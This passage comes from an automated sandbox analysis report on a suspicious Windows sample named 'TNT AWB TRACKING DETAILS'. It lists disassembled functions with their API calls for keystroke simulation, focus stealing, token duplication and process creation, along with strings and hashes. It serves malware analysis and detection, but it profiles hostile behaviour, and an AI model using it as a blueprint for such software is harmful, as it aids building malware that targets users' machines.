                                      • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                      • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                      • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                      Function 00479714 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00479500: VariantInit.OLEAUT32(?), ref: 0047950F
                                        • Part of subcall function 00437063: VariantClear.OLEAUT32(00479459), ref: 0043706B
                                        • Part of subcall function 00437063: VariantCopy.OLEAUT32(00479459,00470E7C), ref: 00437076
                                      • VariantClear.OLEAUT32(?), ref: 0047973E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Variant$Clear$CopyInit
                                      • String ID:
                                      • API String ID: 24293632-0
                                      • Opcode ID: 5d7337fccf444792d50b64af1a389de1ebb3e8953e67bf22bf250c0f7ac223aa
                                      • Instruction ID: ce75823fad5ab463881ca656a32c684f825172ff923cb7d6b6c05433a05b9d1b
                                      • Opcode Fuzzy Hash: 5d7337fccf444792d50b64af1a389de1ebb3e8953e67bf22bf250c0f7ac223aa
                                      • Instruction Fuzzy Hash: C4E012B251010C6B8704FBFDDDC6CAFB7BCFB18204B80495DB919A3142EA75A914C7E9
                                      Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __wfsopen
                                      • String ID:
                                      • API String ID: 197181222-0
                                      • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                      • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                      • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                      • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                      Function 03F3BB0C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNELBASE(000001F4), ref: 03F3BB21
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1452276685.0000000003F39000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F39000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_3f39000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                      • Instruction ID: 593cc08aea61bd92783624a22afab0ec69b4970239d1bd055cec468a63b451cd
                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                      • Instruction Fuzzy Hash: 25E0BF7494020DEFDB00EFE8D5496DE7BB4EF04301F1005A1FD05D7681DB309E548A62
                                      Function 03F3BB10 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNELBASE(000001F4), ref: 03F3BB21
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1452276685.0000000003F39000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F39000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_3f39000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction ID: 3a71d38ac47c800ba5bc3ca39d670df1f87d71165537f08fa66b03912eeda841
                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction Fuzzy Hash: 82E0E67494020DDFDB00EFF8D54969E7FB4EF04301F1001A1FD05D2281DA309D508A62

                                      Non-executed Functions

                                      Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                      • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                      • GetKeyState.USER32(00000011), ref: 0047C92D
                                      • GetKeyState.USER32(00000009), ref: 0047C936
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                      • GetKeyState.USER32(00000010), ref: 0047C953
                                      • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                      • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                      • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                      • _wcsncpy.LIBCMT ref: 0047CA29
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                      • SendMessageW.USER32 ref: 0047CA7F
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                      • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                      • ImageList_SetDragCursorImage.COMCTL32(00BE8EF8,00000000,00000000,00000000), ref: 0047CB9B
                                      • ImageList_BeginDrag.COMCTL32(00BE8EF8,00000000,000000F8,000000F0), ref: 0047CBAC
                                      • SetCapture.USER32(?), ref: 0047CBB6
                                      • ClientToScreen.USER32(?,?), ref: 0047CC17
                                      • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                      • ReleaseCapture.USER32 ref: 0047CC3A
                                      • GetCursorPos.USER32(?), ref: 0047CC72
                                      • ScreenToClient.USER32(?,?), ref: 0047CC80
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                      • SendMessageW.USER32 ref: 0047CD12
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                      • SendMessageW.USER32 ref: 0047CD80
                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                      • GetCursorPos.USER32(?), ref: 0047CDC8
                                      • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                      • GetParent.USER32(00000000), ref: 0047CDF7
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                      • SendMessageW.USER32 ref: 0047CE93
                                      • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,030D1B60,00000000,?,?,?,?), ref: 0047CF1C
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                      • SendMessageW.USER32 ref: 0047CF6B
                                      • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,030D1B60,00000000,?,?,?,?), ref: 0047CFE6
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                      • String ID: @GUI_DRAGID$F
                                      • API String ID: 3100379633-4164748364
                                      • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                      • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                      • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                      • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                      Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 00434420
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                      • IsIconic.USER32(?), ref: 0043444F
                                      • ShowWindow.USER32(?,00000009), ref: 0043445C
                                      • SetForegroundWindow.USER32(?), ref: 0043446A
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                      • GetCurrentThreadId.KERNEL32 ref: 00434485
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                      • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                      • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                      • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                      • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                      • keybd_event.USER32(00000012,00000000), ref: 00434514
                                      • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                      • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 2889586943-2988720461
                                      • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                      • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                      • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                      • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                      Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                      • CloseHandle.KERNEL32(?), ref: 004463A0
                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                      • GetProcessWindowStation.USER32 ref: 004463D1
                                      • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                      • _wcslen.LIBCMT ref: 00446498
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • _wcsncpy.LIBCMT ref: 004464C0
                                      • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                      • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                      • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                      • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                      • CloseWindowStation.USER32(00000000), ref: 0044656C
                                      • CloseDesktop.USER32(?), ref: 0044657A
                                      • SetProcessWindowStation.USER32(?), ref: 00446588
                                      • CloseHandle.KERNEL32(?), ref: 00446592
                                      • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                      • String ID: $@OH$default$winsta0
                                      • API String ID: 3324942560-3791954436
                                      • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                      • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                      • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                      • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                      Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                      • FindClose.KERNEL32(00000000), ref: 00478924
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                      • __swprintf.LIBCMT ref: 004789D3
                                      • __swprintf.LIBCMT ref: 00478A1D
                                      • __swprintf.LIBCMT ref: 00478A4B
                                      • __swprintf.LIBCMT ref: 00478A79
                                        • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                        • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                      • __swprintf.LIBCMT ref: 00478AA7
                                      • __swprintf.LIBCMT ref: 00478AD5
                                      • __swprintf.LIBCMT ref: 00478B03
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                      • API String ID: 999945258-2428617273
                                      • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                      • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                      • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                      • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                      Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                      • __wsplitpath.LIBCMT ref: 00403492
                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                      • _wcscpy.LIBCMT ref: 004034A7
                                      • _wcscat.LIBCMT ref: 004034BC
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                        • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                        • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                      • _wcscpy.LIBCMT ref: 004035A0
                                      • _wcslen.LIBCMT ref: 00403623
                                      • _wcslen.LIBCMT ref: 0040367D
                                      Strings
                                      • Unterminated string, xrefs: 00428348
                                      • _, xrefs: 0040371C
                                      • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                      • Error opening the file, xrefs: 00428231
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                      • API String ID: 3393021363-188983378
                                      • Opcode ID: 8f97009b1bf37824170bfd28a55259835aaf6cf29f8ea0c932b2b617a2771f3f
                                      • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                      • Opcode Fuzzy Hash: 8f97009b1bf37824170bfd28a55259835aaf6cf29f8ea0c932b2b617a2771f3f
                                      • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                      Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                      • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                      • FindClose.KERNEL32(00000000), ref: 00431B20
                                      • FindClose.KERNEL32(00000000), ref: 00431B34
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                      • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                      • FindClose.KERNEL32(00000000), ref: 00431BCD
                                      • FindClose.KERNEL32(00000000), ref: 00431BDB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                      • String ID: *.*
                                      • API String ID: 1409584000-438819550
                                      • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                      • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                      • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                      • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                      Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                      • __swprintf.LIBCMT ref: 00431C2E
                                      • _wcslen.LIBCMT ref: 00431C3A
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                      • String ID: :$\$\??\%s
                                      • API String ID: 2192556992-3457252023
                                      • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                      • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                      • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                      • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                      Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocalTime.KERNEL32(?), ref: 004722A2
                                      • __swprintf.LIBCMT ref: 004722B9
                                      • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                      • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                      • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                      • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                      • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                      • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                      • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                      • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                      • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                      Strings
                                      Memory Dump Source
